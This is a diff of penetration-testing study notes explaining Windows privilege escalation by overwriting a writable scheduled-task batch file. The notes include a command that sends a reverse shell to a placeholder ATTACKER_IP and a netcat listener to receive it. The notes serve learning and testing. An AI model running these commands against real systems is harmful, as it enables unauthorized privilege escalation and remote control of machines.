NischalDaCoder/vapt-learning/notes/VAPT_Notes.md

   - It can be listed using:

 			> schtasks /query /tn vulntask /fo list /v

-	-> Looking at the information we will get here, we could easily identify the scheduled task by looking at the "Task to Run" parameter.
+	 - Looking at the information we will get here, we could easily identify the scheduled task by looking at the "Task to Run" parameter.
 Also, "Run As User" parameter could help us identify the user that will be used to execute the task.
 So, if our current user can modify this "Task to Run" executable, then we can control the script that will be executed by this user which results in a simple privilege escalation.

-	-> To check the file permission on the executable, we can use:
+	 - To check the file permission on the executable, we can use:

 			> icacls c:\tasks\schtask.bat

-	-> If the BUILTIN\Users group has full access (F) over this tasks binary, then we can modify the .bat file and insert any payload we want.
-After creating a payload we coud just do:
+	 - If the BUILTIN\Users group has full access (F) over this tasks binary, then we can modify the .bat file and insert any payload we want.
+After creating a payload we coud just use this command:

 			> echo c:\path\to\payload.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

-	-> We listen on our attacking machine
+	 - We listen on our attacking machine

 			> nc-lvnp 4444

-	-> So the next time the scheduled task runs, we will recieve the reverse shell with the user privilege that was supposed to run this task.
+	 - So the next time the scheduled task runs, we will recieve the reverse shell with the user privilege that was supposed to run this task.

 ### AlwaysInstallElevated: